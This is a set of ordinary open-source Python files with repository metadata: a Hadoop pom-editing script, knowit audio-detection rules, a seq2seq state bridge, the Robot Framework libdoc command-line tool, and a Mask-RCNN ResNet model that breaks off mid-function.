break
for o in dep.getElementsByTagName('optional'):
dep.removeChild(o)
p = subprocess.Popen(['./getBranchAndVersion.sh'], stdout=subprocess.PIPE)
branch_and_version, err = p.communicate()
splits = branch_and_version.split('-')
branch = splits[0]
branch_to_version = branch_to_version_mapping(branch)
if branch_to_version != -1 :
maven_version = "%s.%s" % (branch_to_version, splits[1])
# Update the pom with the version specified.
version = doc.getElementsByTagName('version')[0]
version.firstChild.nodeValue = maven_version
# Update the pom with correct artifactId specified.
artifactId = doc.getElementsByTagName('artifactId')[0]
artifactId.firstChild.nodeValue = "hadoop-hdfs"
# Add the branch name to the pom
root = doc.documentElement
firstChild = root.childNodes[0]
name = doc.createElementNS(None,'name')
txt = doc.createTextNode(branch)
name.appendChild(txt)
root.insertBefore(name, firstChild)
modify_pom('highavailability.pom', maven_version)
modify_pom('raid.pom', maven_version)
modify_pom('seekablecompression.pom', maven_version)
print get_output(doc)
| {
"content_hash": "3c2a3ab1a0eb3cc7e00827c1bbacc1bd",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 95,
"avg_line_length": 30.869158878504674,
"alnum_prop": 0.670299727520436,
"repo_name": "shakamunyi/hadoop-20",
"id": "ef15718601e9f185b60c2219cb251f354d75a939",
"size": "3326",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "edit_generated_pom.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import typing
from decimal import Decimal
from logging import NullHandler, getLogger
from knowit.core import Rule
logger = getLogger(__name__)
logger.addHandler(NullHandler())
class AtmosRule(Rule):
"""Atmos rule."""
def __init__(self, config: typing.Mapping[str, typing.Mapping], name: str,
**kwargs):
"""Initialize an Atmos rule."""
super().__init__(name, **kwargs)
self.audio_codecs = getattr(config, 'AudioCodec')
def execute(self, props, pv_props, context):
"""Execute the rule against properties."""
profile = context.get('profile') or 'default'
format_commercial = pv_props.get('format_commercial')
if 'codec' in props and format_commercial and 'atmos' in format_commercial.lower():
props['codec'] = [props['codec'],
getattr(self.audio_codecs['ATMOS'], profile)]
class AudioChannelsRule(Rule):
"""Audio Channel rule."""
mapping = {
1: '1.0',
2: '2.0',
6: '5.1',
8: '7.1',
}
def execute(self, props, pv_props, context):
"""Execute the rule against properties."""
count = props.get('channels_count')
if count is None:
return
channels = self.mapping.get(count) if isinstance(count, int) else None
positions = pv_props.get('channel_positions') or []
positions = positions if isinstance(positions, list) else [positions]
candidate = 0
for position in positions:
if not position:
continue
c = Decimal('0.0')
for i in position.split('/'):
try:
c += Decimal(i)
except ValueError:
logger.debug('Invalid %s: %s', self.description, i)
pass
c_count = int(c) + int(round((c - int(c)) * 10))
if c_count == count:
return str(c)
candidate = max(candidate, c)
if channels:
return channels
if candidate:
return candidate
self.report(positions, context)
class DtsHdRule(Rule):
"""DTS-HD rule."""
def __init__(self, config: typing.Mapping[str, typing.Mapping], name: str,
**kwargs):
"""Initialize a DTS-HD Rule."""
super().__init__(name, **kwargs)
self.audio_codecs = getattr(config, 'AudioCodec')
self.audio_profiles = getattr(config, 'AudioProfile')
@classmethod
def _redefine(cls, props, name, index):
actual = props.get(name)
if isinstance(actual, list):
value = actual[index]
if value is None:
del props[name]
else:
props[name] = value
def execute(self, props, pv_props, context):
"""Execute the rule against properties."""
profile = context.get('profile') or 'default'
if props.get('codec') == getattr(self.audio_codecs['DTS'],
profile) and props.get('profile') in (
getattr(self.audio_profiles['MA'], profile),
getattr(self.audio_profiles['HRA'], profile)):
props['codec'] = getattr(self.audio_codecs['DTS-HD'], profile)
| {
"content_hash": "564165acc1b4239c3ba1c76898d7f219",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 91,
"avg_line_length": 31.682692307692307,
"alnum_prop": 0.5450682852807284,
"repo_name": "ratoaq2/knowit",
"id": "b35d36437044f616df733d43900cc6f958896e0f",
"size": "3295",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "knowit/rules/audio.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "102251"
}
],
"symlink_target": ""
} |
"""Bridges transform the state from the encoders so they fit the decoder
Inspired by OpenNMT & google/seq2seq
## Available bridges
@@NoBridge
@@ZeroBridge
@@DenseBridge
"""
import tensorflow as tf
import tensorflow.keras as keras
class Bridge:
"""Transforms the state from the encoders so they fit the decoder"""
def __call__(self, zero_state, init_state):
"""
Creates a state for a cell that accepts `zero_state` type of states. Uses
`init` as the input.
Args:
zero_state (tf.Tensor): the result of cell#zero_state().
init_state (tf.Tensor): initialization for the state.
[batch_size, size]
Returns:
init_state (tf.Tensor): same size as `zero_state`, initialized with
`init_state`.
"""
raise NotImplementedError
class NoBridge(Bridge):
def __call__(self, zero_state, init_state):
return init_state
class ZeroBridge(Bridge):
def __call__(self, zero_state, init_state):
return zero_state
class DenseBridge(Bridge):
def __call__(self, zero_state, init_state):
# See states as a flat list of tensors
zero_state_flat = tf.contrib.framework.nest.flatten(zero_state)
# Find sizes of all states
dims = [t.get_shape()[-1].value for t in zero_state_flat]
# Project `init` to cover all needed states
states = keras.layers.Dense(sum(dims))(init_state)
# Match dimensions of expected states
states = tf.split(states, dims, axis=1)
# Pack the result to conform with the requested states
return tf.contrib.framework.nest.pack_sequence_as(zero_state, states)
| {
"content_hash": "6c0e04f0275f9315a5dde38d9124beef",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 81,
"avg_line_length": 28.3,
"alnum_prop": 0.6378091872791519,
"repo_name": "jpbottaro/anna",
"id": "7f8d3f66b0ef5ef0af70bbc809ee13ad062126a2",
"size": "1698",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "anna/model/bridge.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1203644"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "122148"
}
],
"symlink_target": ""
} |
USAGE = """robot.libdoc -- Robot Framework library documentation generator
Version: <VERSION>
Usage: python -m robot.libdoc [options] library output_file
or: python -m robot.libdoc [options] library list|show|version [names]
Libdoc tool can generate keyword documentation in HTML and XML formats both
for test libraries and resource files. HTML format is suitable for humans and
XML specs for RIDE and other tools. Libdoc also has few special commands to
show library or resource information on the console.
Libdoc supports all library and resource types and also earlier generated XML
specs can be used as input. If a library needs arguments, they must be given
as part of the library name and separated by two colons, for example, like
`LibraryName::arg1::arg2`.
Options
=======
-f --format HTML|XML Specifies whether to generate HTML or XML output.
If this options is not used, the format is got
from the extension of the output file.
-n --name newname Sets the name of the documented library or resource.
-v --version newversion Sets the version of the documented library or
resource.
-P --pythonpath path * Additional locations where to search for libraries
and resources.
-E --escape what:with * Escapes characters which are problematic in console.
'what' is the name of the character to escape and
'with' is the string to escape it with.
<-------------------ESCAPES------------------------>
-h -? --help Print this help.
Creating documentation
======================
When creating documentation in HTML or XML format, the output file must
be specified as a second argument after the library/resource name or path.
Output format is got automatically from the extension but can also be set
with `--format` option.
Examples:
python -m robot.libdoc src/MyLib.py doc/MyLib.html
jython -m robot.libdoc MyJavaLibrary.java MyJavaLibrary.html
python -m robot.libdoc --name MyLib Remote::10.0.0.42:8270 MyLib.xml
Viewing information on console
==============================
Libdoc has three special commands to show information on the console. These
commands are used instead of the name of the output file, and they can also
take additional arguments.
list: List names of the keywords the library/resource contains. Can be
limited to show only certain keywords by passing optional patterns as
arguments. Keyword is listed if its name contains any given pattern.
show: Show library/resource documentation. Can be limited to show only
certain keywords by passing names as arguments. Keyword is shown if
its name matches any given name. Special argument `intro` will show
the library introduction and importing sections.
version: Show library version
Optional patterns given to `list` and `show` are case and space insensitive.
Both also accept `*` and `?` as wildcards.
Examples:
python -m robot.libdoc Dialogs list
python -m robot.libdoc Selenium2Library list browser
python -m robot.libdoc Remote::10.0.0.42:8270 show
python -m robot.libdoc Dialogs show PauseExecution execute*
python -m robot.libdoc Selenium2Library show intro
python -m robot.libdoc Selenium2Library version
Alternative execution
=====================
Libdoc works with all interpreters supported by Robot Framework (Python,
Jython and IronPython). In the examples above libdoc is executed as an
installed module, but it can also be executed as a script like
`python path/robot/libdoc.py`.
For more information see libdoc section in Robot Framework User Guide at
http://code.google.com/p/robotframework/wiki/UserGuide
"""
import sys
import os
# Allows running as a script. __name__ check needed with multiprocessing:
# http://code.google.com/p/robotframework/issues/detail?id=1137
if 'robot' not in sys.modules and __name__ == '__main__':
import pythonpathsetter
from robot.utils import Application
from robot.errors import DataError
from robot.libdocpkg import LibraryDocumentation, ConsoleViewer
class LibDoc(Application):
def __init__(self):
Application.__init__(self, USAGE, arg_limits=(2,), auto_version=False)
def validate(self, options, arguments):
if ConsoleViewer.handles(arguments[1]):
ConsoleViewer.validate_command(arguments[1], arguments[2:])
elif len(arguments) > 2:
raise DataError('Only two arguments allowed when writing output.')
return options, arguments
def main(self, args, name='', version='', format=None):
lib_or_res, output = args[:2]
libdoc = LibraryDocumentation(lib_or_res, name, version)
if ConsoleViewer.handles(output):
ConsoleViewer(libdoc).view(output, *args[2:])
else:
libdoc.save(output, self._get_format(format, output))
self.console(os.path.abspath(output))
def _get_format(self, format, output):
format = (format if format else os.path.splitext(output)[1][1:]).upper()
if format in ['HTML', 'XML']:
return format
raise DataError("Format must be either 'HTML' or 'XML', got '%s'." % format)
def libdoc_cli(args):
"""Executes libdoc similarly as from the command line.
:param args: command line arguments as a list of strings.
Example:
libdoc_cli(['--name', 'Something', 'MyLibrary.py', 'doc.html'])
"""
LibDoc().execute_cli(args)
def libdoc(library_or_resource, outfile, name='', version='', format=None):
"""Executes libdoc.
Arguments are same as command line options to libdoc.py.
Example:
libdoc('MyLibrary.py', 'MyLibrary.html', version='1.0')
"""
LibDoc().execute(library_or_resource, outfile, name=name, version=version,
format=format)
if __name__ == '__main__':
libdoc_cli(sys.argv[1:])
| {
"content_hash": "1865120db17a2c2848beab94ad03048c",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 84,
"avg_line_length": 38.63870967741936,
"alnum_prop": 0.6842544665219569,
"repo_name": "Senseg/robotframework",
"id": "cbc208f8cf995cc86c5e459559d05f31c9db5096",
"size": "6618",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/robot/libdoc.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "716"
},
{
"name": "Java",
"bytes": "48873"
},
{
"name": "JavaScript",
"bytes": "149654"
},
{
"name": "Python",
"bytes": "1637427"
},
{
"name": "Shell",
"bytes": "1323"
}
],
"symlink_target": ""
} |
"""Mask-RCNN (via ResNet) model definition.
Uses the ResNet model as a basis.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import anchors
from object_detection import balanced_positive_negative_sampler
from mlperf_compliance import mlperf_log
_BATCH_NORM_DECAY = 0.997
_BATCH_NORM_EPSILON = 1e-4
_RESNET_MAX_LEVEL = 5
_EPSILON = 1e-8
_NMS_TILE_SIZE = 512
def batch_norm_relu(inputs,
is_training_bn,
relu=True,
init_zero=False,
data_format='channels_last',
name=None):
"""Performs a batch normalization followed by a ReLU.
Args:
inputs: `Tensor` of shape `[batch, channels, ...]`.
is_training_bn: `bool` for whether the model is training.
relu: `bool` if False, omits the ReLU operation.
init_zero: `bool` if True, initializes scale parameter of batch
normalization with 0 instead of 1 (default).
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
name: the name of the batch normalization layer
Returns:
A normalized `Tensor` with the same `data_format`.
"""
if init_zero:
gamma_initializer = tf.zeros_initializer()
else:
gamma_initializer = tf.ones_initializer()
if data_format == 'channels_first':
axis = 1
else:
axis = 3
inputs = tf.layers.batch_normalization(
inputs=inputs,
axis=axis,
momentum=_BATCH_NORM_DECAY,
epsilon=_BATCH_NORM_EPSILON,
center=True,
scale=True,
training=is_training_bn,
fused=True,
gamma_initializer=gamma_initializer,
name=name)
if relu:
inputs = tf.nn.relu(inputs)
return inputs
def fixed_padding(inputs, kernel_size, data_format='channels_last'):
"""Pads the input along the spatial dimensions independently of input size.
Args:
inputs: `Tensor` of size `[batch, channels, height, width]` or
`[batch, height, width, channels]` depending on `data_format`.
kernel_size: `int` kernel size to be used for `conv2d` or max_pool2d`
operations. Should be a positive integer.
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
Returns:
A padded `Tensor` of the same `data_format` with size either intact
(if `kernel_size == 1`) or padded (if `kernel_size > 1`).
"""
pad_total = kernel_size - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
if data_format == 'channels_first':
padded_inputs = tf.pad(
inputs, [[0, 0], [0, 0], [pad_beg, pad_end], [pad_beg, pad_end]])
else:
padded_inputs = tf.pad(
inputs, [[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]])
return padded_inputs
def conv2d_fixed_padding(inputs,
filters,
kernel_size,
strides,
data_format='channels_last'):
"""Strided 2-D convolution with explicit padding.
The padding is consistent and is based only on `kernel_size`, not on the
dimensions of `inputs` (as opposed to using `tf.layers.conv2d` alone).
Args:
inputs: `Tensor` of size `[batch, channels, height_in, width_in]`.
filters: `int` number of filters in the convolution.
kernel_size: `int` size of the kernel to be used in the convolution.
strides: `int` strides of the convolution.
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
Returns:
A `Tensor` of shape `[batch, filters, height_out, width_out]`.
"""
if strides > 1:
inputs = fixed_padding(inputs, kernel_size, data_format=data_format)
return tf.layers.conv2d(
inputs=inputs,
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=('SAME' if strides == 1 else 'VALID'),
use_bias=False,
kernel_initializer=tf.variance_scaling_initializer(),
data_format=data_format)
def residual_block(inputs,
filters,
is_training_bn,
strides,
use_projection=False,
data_format='channels_last'):
"""Standard building block for residual networks with BN after convolutions.
Args:
inputs: `Tensor` of size `[batch, channels, height, width]`.
filters: `int` number of filters for the first two convolutions. Note that
the third and final convolution will use 4 times as many filters.
is_training_bn: `bool` for whether the model is in training.
strides: `int` block stride. If greater than 1, this block will ultimately
downsample the input.
use_projection: `bool` for whether this block should use a projection
shortcut (versus the default identity shortcut). This is usually `True`
for the first block of a block group, which may change the number of
filters and the resolution.
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
Returns:
The output `Tensor` of the block.
"""
shortcut = inputs
if use_projection:
# Projection shortcut in first layer to match filters and strides
shortcut = conv2d_fixed_padding(
inputs=inputs,
filters=filters,
kernel_size=1,
strides=strides,
data_format=data_format)
shortcut = batch_norm_relu(
shortcut, is_training_bn, relu=False, data_format=data_format)
inputs = conv2d_fixed_padding(
inputs=inputs,
filters=filters,
kernel_size=3,
strides=strides,
data_format=data_format)
inputs = batch_norm_relu(inputs, is_training_bn, data_format=data_format)
inputs = conv2d_fixed_padding(
inputs=inputs,
filters=filters,
kernel_size=3,
strides=1,
data_format=data_format)
inputs = batch_norm_relu(
inputs,
is_training_bn,
relu=False,
init_zero=True,
data_format=data_format)
return tf.nn.relu(inputs + shortcut)
def bottleneck_block(inputs,
filters,
is_training_bn,
strides,
use_projection=False,
data_format='channels_last'):
"""Bottleneck block variant for residual networks with BN after convolutions.
Args:
inputs: `Tensor` of size `[batch, channels, height, width]`.
filters: `int` number of filters for the first two convolutions. Note that
the third and final convolution will use 4 times as many filters.
is_training_bn: `bool` for whether the model is in training.
strides: `int` block stride. If greater than 1, this block will ultimately
downsample the input.
use_projection: `bool` for whether this block should use a projection
shortcut (versus the default identity shortcut). This is usually `True`
for the first block of a block group, which may change the number of
filters and the resolution.
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
Returns:
The output `Tensor` of the block.
"""
shortcut = inputs
if use_projection:
# Projection shortcut only in first block within a group. Bottleneck blocks
# end with 4 times the number of filters.
filters_out = 4 * filters
shortcut = conv2d_fixed_padding(
inputs=inputs,
filters=filters_out,
kernel_size=1,
strides=strides,
data_format=data_format)
shortcut = batch_norm_relu(
shortcut, is_training_bn, relu=False, data_format=data_format)
inputs = conv2d_fixed_padding(
inputs=inputs,
filters=filters,
kernel_size=1,
strides=1,
data_format=data_format)
inputs = batch_norm_relu(inputs, is_training_bn, data_format=data_format)
inputs = conv2d_fixed_padding(
inputs=inputs,
filters=filters,
kernel_size=3,
strides=strides,
data_format=data_format)
inputs = batch_norm_relu(inputs, is_training_bn, data_format=data_format)
inputs = conv2d_fixed_padding(
inputs=inputs,
filters=4 * filters,
kernel_size=1,
strides=1,
data_format=data_format)
inputs = batch_norm_relu(
inputs,
is_training_bn,
relu=False,
init_zero=True,
data_format=data_format)
return tf.nn.relu(inputs + shortcut)
def block_group(inputs,
filters,
block_fn,
blocks,
strides,
is_training_bn,
name,
data_format='channels_last'):
"""Creates one group of blocks for the ResNet model.
Args:
inputs: `Tensor` of size `[batch, channels, height, width]`.
filters: `int` number of filters for the first convolution of the layer.
block_fn: `function` for the block to use within the model
blocks: `int` number of blocks contained in the layer.
strides: `int` stride to use for the first convolution of the layer. If
greater than 1, this layer will downsample the input.
is_training_bn: `bool` for whether the model is training.
name: `str`name for the Tensor output of the block layer.
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
Returns:
The output `Tensor` of the block layer.
"""
# Only the first block per block_group uses projection shortcut and strides.
inputs = block_fn(
inputs,
filters,
is_training_bn,
strides,
use_projection=True,
data_format=data_format)
for _ in range(1, blocks):
inputs = block_fn(
inputs, filters, is_training_bn, 1, data_format=data_format)
return tf.identity(inputs, name)
def resnet_v1_generator(block_fn, layers, data_format='channels_last'):
"""Generator of ResNet v1 model with classification layers removed.
Our actual ResNet network. We return the output of c2, c3,c4,c5
N.B. batch norm is always run with trained parameters, as we use very small
batches when training the object layers.
Args:
block_fn: `function` for the block to use within the model. Either
`residual_block` or `bottleneck_block`.
layers: list of 4 `int`s denoting the number of blocks to include in each
of the 4 block groups. Each group consists of blocks that take inputs of
the same resolution.
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
Returns:
Model `function` that takes in `inputs` and `is_training` and returns the
output `Tensor` of the ResNet model.
"""
def model(inputs, is_training_bn=False):
"""Creation of the model graph."""
inputs = conv2d_fixed_padding(
inputs=inputs,
filters=64,
kernel_size=7,
strides=2,
data_format=data_format)
inputs = tf.identity(inputs, 'initial_conv')
inputs = batch_norm_relu(inputs, is_training_bn, data_format=data_format)
inputs = tf.layers.max_pooling2d(
inputs=inputs,
pool_size=3,
strides=2,
padding='SAME',
data_format=data_format)
inputs = tf.identity(inputs, 'initial_max_pool')
c2 = block_group(
inputs=inputs,
filters=64,
blocks=layers[0],
strides=1,
block_fn=block_fn,
is_training_bn=is_training_bn,
name='block_group1',
data_format=data_format)
c3 = block_group(
inputs=c2,
filters=128,
blocks=layers[1],
strides=2,
block_fn=block_fn,
is_training_bn=is_training_bn,
name='block_group2',
data_format=data_format)
c4 = block_group(
inputs=c3,
filters=256,
blocks=layers[2],
strides=2,
block_fn=block_fn,
is_training_bn=is_training_bn,
name='block_group3',
data_format=data_format)
c5 = block_group(
inputs=c4,
filters=512,
blocks=layers[3],
strides=2,
block_fn=block_fn,
is_training_bn=is_training_bn,
name='block_group4',
data_format=data_format)
return c2, c3, c4, c5
return model
def resnet_v1(resnet_depth, data_format='channels_last'):
"""Returns the ResNet model for a given size and number of output classes."""
model_params = {
18: {'block': residual_block, 'layers': [2, 2, 2, 2]},
34: {'block': residual_block, 'layers': [3, 4, 6, 3]},
50: {'block': bottleneck_block, 'layers': [3, 4, 6, 3]},
101: {'block': bottleneck_block, 'layers': [3, 4, 23, 3]},
152: {'block': bottleneck_block, 'layers': [3, 8, 36, 3]},
200: {'block': bottleneck_block, 'layers': [3, 24, 36, 3]}
}
if resnet_depth not in model_params:
raise ValueError('Not a valid resnet_depth:', resnet_depth)
mlperf_log.maskrcnn_print(key=mlperf_log.BACKBONE,
value='resnet{}'.format(resnet_depth))
params = model_params[resnet_depth]
return resnet_v1_generator(
params['block'], params['layers'], data_format)
def nearest_upsampling(data, scale):
"""Nearest neighbor upsampling implementation.
Args:
data: A tensor with a shape of [batch, height_in, width_in, channels].
scale: An integer multiple to scale resolution of input data.
Returns:
data_up: A tensor with a shape of
[batch, height_in*scale, width_in*scale, channels]. Same dtype as input
data.
"""
with tf.name_scope('nearest_upsampling'):
bs, h, w, c = data.get_shape().as_list()
bs = -1 if bs is None else bs
# Use reshape to quickly upsample the input. The nearest pixel is selected
# implicitly via broadcasting.
data = tf.reshape(data, [bs, h, 1, w, 1, c]) * tf.ones(
[1, 1, scale, 1, scale, 1], dtype=data.dtype)
return tf.reshape(data, [bs, h * scale, w * scale, c])
def _bbox_overlap(boxes, gt_boxes):
"""Calculates the overlap between proposal and ground truth boxes.
Some `gt_boxes` may have been padded. The returned `iou` tensor for these
boxes will be -1.
Args:
boxes: a tensor with a shape of [batch_size, N, 4]. N is the number of
proposals before groundtruth assignment (e.g., rpn_post_nms_topn). The
last dimension is the pixel coordinates in [ymin, xmin, ymax, xmax] form.
gt_boxes: a tensor with a shape of [batch_size, MAX_NUM_INSTANCES, 4]. This
tensor might have paddings with a negative value.
Returns:
iou: a tensor with as a shape of [batch_size, N, MAX_NUM_INSTANCES].
"""
with tf.name_scope('bbox_overlap'):
bb_y_min, bb_x_min, bb_y_max, bb_x_max = tf.split(
value=boxes, num_or_size_splits=4, axis=2)
gt_y_min, gt_x_min, gt_y_max, gt_x_max = tf.split(
value=gt_boxes, num_or_size_splits=4, axis=2)
# Calculates the intersection area.
i_xmin = tf.maximum(bb_x_min, tf.transpose(gt_x_min, [0, 2, 1]))
i_xmax = tf.minimum(bb_x_max, tf.transpose(gt_x_max, [0, 2, 1]))
i_ymin = tf.maximum(bb_y_min, tf.transpose(gt_y_min, [0, 2, 1]))
i_ymax = tf.minimum(bb_y_max, tf.transpose(gt_y_max, [0, 2, 1]))
i_area = tf.maximum((i_xmax - i_xmin), 0) * tf.maximum((i_ymax - i_ymin), 0)
# Calculates the union area.
bb_area = (bb_y_max - bb_y_min) * (bb_x_max - bb_x_min)
gt_area = (gt_y_max - gt_y_min) * (gt_x_max - gt_x_min)
# Adds a small epsilon to avoid divide-by-zero.
u_area = bb_area + tf.transpose(gt_area, [0, 2, 1]) - i_area + 1e-8
# Calculates IoU.
iou = i_area / u_area
# Fills -1 for padded ground truth boxes.
padding_mask = tf.less(i_xmin, tf.zeros_like(i_xmin))
iou = tf.where(padding_mask, -tf.ones_like(iou), iou)
return iou
def _add_class_assignments(iou, scaled_gt_boxes, gt_labels):
"""Computes object category assignment for each box.
Args:
iou: a tensor for the iou matrix with a shape of
[batch_size, K, MAX_NUM_INSTANCES]. K is the number of post-nms RoIs
(i.e., rpn_post_nms_topn).
scaled_gt_boxes: a tensor with a shape of
[batch_size, MAX_NUM_INSTANCES, 4]. This tensor might have paddings with
negative values. The coordinates of gt_boxes are in the pixel coordinates
of the scaled image scale.
gt_labels: a tensor with a shape of [batch_size, MAX_NUM_INSTANCES]. This
tensor might have paddings with a value of -1.
Returns:
max_boxes: a tensor with a shape of [batch_size, K, 4], representing
the ground truth coordinates of each roi.
max_classes: a int32 tensor with a shape of [batch_size, K], representing
the ground truth class of each roi.
max_overlap: a tensor with a shape of [batch_size, K], representing
the maximum overlap of each roi.
argmax_iou: a tensor with a shape of [batch_size, K], representing the iou
argmax.
"""
with tf.name_scope('add_class_assignments'):
batch_size, _, _ = iou.get_shape().as_list()
argmax_iou = tf.argmax(iou, axis=2, output_type=tf.int32)
indices = tf.reshape(
argmax_iou + tf.expand_dims(
tf.range(batch_size) * tf.shape(gt_labels)[1], 1), [-1])
max_classes = tf.reshape(
tf.gather(tf.reshape(gt_labels, [-1, 1]), indices), [batch_size, -1])
max_overlap = tf.reduce_max(iou, axis=2)
bg_mask = tf.equal(max_overlap, tf.zeros_like(max_overlap))
max_classes = tf.where(bg_mask, tf.zeros_like(max_classes), max_classes)
max_boxes = tf.reshape(
tf.gather(tf.reshape(scaled_gt_boxes, [-1, 4]), indices),
[batch_size, -1, 4])
max_boxes = tf.where(
tf.tile(tf.expand_dims(bg_mask, axis=2), [1, 1, 4]),
tf.zeros_like(max_boxes), max_boxes)
return max_boxes, max_classes, max_overlap, argmax_iou
def encode_box_targets(boxes, gt_boxes, gt_labels, bbox_reg_weights):
"""Encodes predicted boxes with respect to ground truth boxes."""
with tf.name_scope('encode_box_targets'):
box_targets = anchors.batch_encode_box_targets_op(
boxes, gt_boxes, bbox_reg_weights)
# If a target is background, the encoded box target should be zeros.
mask = tf.tile(
tf.expand_dims(tf.equal(gt_labels, tf.zeros_like(gt_labels)), axis=2),
[1, 1, 4])
box_targets = tf.where(mask, tf.zeros_like(box_targets), box_targets)
return box_targets
def proposal_label_op(boxes, gt_boxes, gt_labels, image_info,
batch_size_per_im=512, fg_fraction=0.25, fg_thresh=0.5,
bg_thresh_hi=0.5, bg_thresh_lo=0., is_training=True):
"""Assigns the proposals with ground truth labels and performs subsmpling.
Given proposal `boxes`, `gt_boxes`, and `gt_labels`, the function uses the
following algorithm to generate the final `batch_size_per_im` RoIs.
1. Calculates the IoU between each proposal box and each gt_boxes.
2. Assigns each proposal box with a ground truth class and box label by
choosing the largest overlap.
3. Samples `batch_size_per_im` boxes from all proposal boxes, and returns
box_targets, class_targets, and RoIs.
The reference implementations of #1 and #2 are here: https://github.com/facebookresearch/Detectron/blob/master/detectron/datasets/json_dataset.py # pylint: disable=line-too-long
The reference implementation of #3 is here: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/fast_rcnn.py. # pylint: disable=line-too-long
Args:
boxes: a tensor with a shape of [batch_size, N, 4]. N is the number of
proposals before groundtruth assignment (e.g., rpn_post_nms_topn). The
last dimension is the pixel coordinates of scaled images in
[ymin, xmin, ymax, xmax] form.
gt_boxes: a tensor with a shape of [batch_size, MAX_NUM_INSTANCES, 4]. This
tensor might have paddings with a value of -1. The coordinates of gt_boxes
are in the pixel coordinates of the original image scale.
gt_labels: a tensor with a shape of [batch_size, MAX_NUM_INSTANCES]. This
tensor might have paddings with a value of -1.
image_info: a tensor of shape [batch_size, 5] where the three columns
encode the input image's [height, width, scale,
original_height, original_width]. Height and width are for
the input to the network, not the original image; scale is the scale
factor used to scale the network input size to the original image size.
See dataloader.DetectionInputProcessor for details. The last two are
original height and width.
batch_size_per_im: a integer represents RoI minibatch size per image.
fg_fraction: a float represents the target fraction of RoI minibatch that
is labeled foreground (i.e., class > 0).
fg_thresh: a float represents the overlap threshold for an RoI to be
considered foreground (if >= fg_thresh).
bg_thresh_hi: a float represents the overlap threshold for an RoI to be
considered background (class = 0 if overlap in [LO, HI)).
bg_thresh_lo: a float represents the overlap threshold for an RoI to be
considered background (class = 0 if overlap in [LO, HI)).
is_training: a boolean that indicates the training mode, which performs
subsampling; otherwise, no subsampling.
Returns:
box_targets: a tensor with a shape of [batch_size, K, 4]. The tensor
contains the ground truth pixel coordinates of the scaled images for each
roi. K is the number of sample RoIs (e.g., batch_size_per_im).
class_targets: a integer tensor with a shape of [batch_size, K]. The tensor
contains the ground truth class for each roi.
rois: a tensor with a shape of [batch_size, K, 4], representing the
coordinates of the selected RoI.
proposal_to_label_map: a tensor with a shape of [batch_size, K]. This tensor
keeps the mapping between proposal to labels. proposal_to_label_map[i]
means the index of the ground truth instance for the i-th proposal.
"""
with tf.name_scope('proposal_label'):
batch_size = boxes.shape[0]
# Scales ground truth boxes to the scaled image coordinates.
image_scale = 1 / image_info[:, 2]
scaled_gt_boxes = gt_boxes * tf.reshape(image_scale, [batch_size, 1, 1])
# The reference implementation intentionally includes ground truth boxes in
# the proposals. see https://github.com/facebookresearch/Detectron/blob/master/detectron/datasets/json_dataset.py#L359. # pylint: disable=line-too-long
if is_training:
boxes = tf.concat([boxes, scaled_gt_boxes], axis=1)
iou = _bbox_overlap(boxes, scaled_gt_boxes)
(pre_sample_box_targets, pre_sample_class_targets, max_overlap,
proposal_to_label_map) = _add_class_assignments(
iou, scaled_gt_boxes, gt_labels)
# Generates a random sample of RoIs comprising foreground and background
# examples. reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/fast_rcnn.py#L132 # pylint: disable=line-too-long
positives = tf.greater(max_overlap,
fg_thresh * tf.ones_like(max_overlap))
negatives = tf.logical_and(
tf.greater_equal(max_overlap,
bg_thresh_lo * tf.ones_like(max_overlap)),
tf.less(max_overlap,
bg_thresh_hi * tf.ones_like(max_overlap)))
pre_sample_class_targets = tf.where(
negatives, tf.zeros_like(pre_sample_class_targets),
pre_sample_class_targets)
proposal_to_label_map = tf.where(
negatives, tf.zeros_like(proposal_to_label_map),
proposal_to_label_map)
# Returns box/class targets and rois before sampling for evaluation.
if not is_training:
return (pre_sample_box_targets, pre_sample_class_targets,
boxes, proposal_to_label_map)
# Handles ground truth paddings.
ignore_mask = tf.less(
tf.reduce_min(iou, axis=2), tf.zeros_like(max_overlap))
# indicator includes both positive and negative labels.
# labels includes only positives labels.
# positives = indicator & labels.
# negatives = indicator & !labels.
# ignore = !indicator.
labels = positives
pos_or_neg = tf.logical_or(positives, negatives)
indicator = tf.logical_and(pos_or_neg, tf.logical_not(ignore_mask))
all_samples = []
sampler = (
balanced_positive_negative_sampler.BalancedPositiveNegativeSampler(
positive_fraction=fg_fraction, is_static=True))
# Batch-unroll the sub-sampling process.
for i in range(batch_size):
samples = sampler.subsample(
indicator[i], batch_size_per_im, labels[i])
all_samples.append(samples)
all_samples = tf.stack([all_samples], axis=0)[0]
# A workaround to get the indices from the boolean tensors.
_, samples_indices = tf.nn.top_k(tf.to_int32(all_samples),
